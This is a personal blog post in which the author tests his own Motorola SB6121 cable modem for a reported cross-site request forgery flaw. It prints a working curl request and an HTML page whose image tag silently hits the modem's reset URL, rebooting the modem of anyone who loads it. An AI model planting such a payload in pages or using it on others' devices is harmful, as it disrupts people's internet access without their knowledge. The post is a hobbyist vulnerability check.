Motorola Surfboard Hack  

So I just found the article here:
http://thehackernews.com/2016/04/hack-modem-internet.html

That describes an CSRF attack to reboot, or worse, factory reset your cable modem. I wanted to see if my SB6121 was also vulnerable.

I quickly browsed to:

192.168.100.1

and was greeted with this screen:

2016-04-11_23-54-32.png

So I dug into the configurations page and found this:

a.png

So? I clicked it (REBOOT that is). And within a few short moments my modem rebooted…. Ok yep that worked.

So I put together this test:

curl 'http://192.168.100.1/reset.htm?reset_modem=Restart+Cable+Modem' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Referer: http://192.168.100.1/cmConfigData.htm' -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' --compressed

(Actually I used chrome to make the curl of the click)

I ran that, and, within a few short moments my modem rebooted.
Ok neat.

So I put together this:

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Surfboard Test</title>
</head>
<img src="https://192.168.100.1/logo.gif">
<h1>This is a test</h1>
<body>
</html>

And I browsed to it… Yep it worked too.
This will displlay the modem logo if it works:
Here it is if you want to see if it works for you

Hrm.
Ok Might as well try the reboot again.

<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Surfboard Test</title>
</head>
<img src="https://192.168.100.1/reset.htm?reset_modem=Restart+Cable+Modem">
<h1>This is a test</h1>
<body>
</html>

And I browsed to it… And my modem reset again.
Of course I made one of this too. Here it is:

 If you click this your modem may reboot!

 Seriously

Here it is if you want to see if it works for you

I’m not going to try the other one….

Great.

 
5
Kudos
 
5
Kudos

Now read this

UDP Server Study Part 1

Download Repo Here So a few weeks ago I secured a new job with a technology company here in Indy. Part of my new role will be re-architecting the backend solution to help improve performance, and eventually migrate the solution to AWS. I... Continue →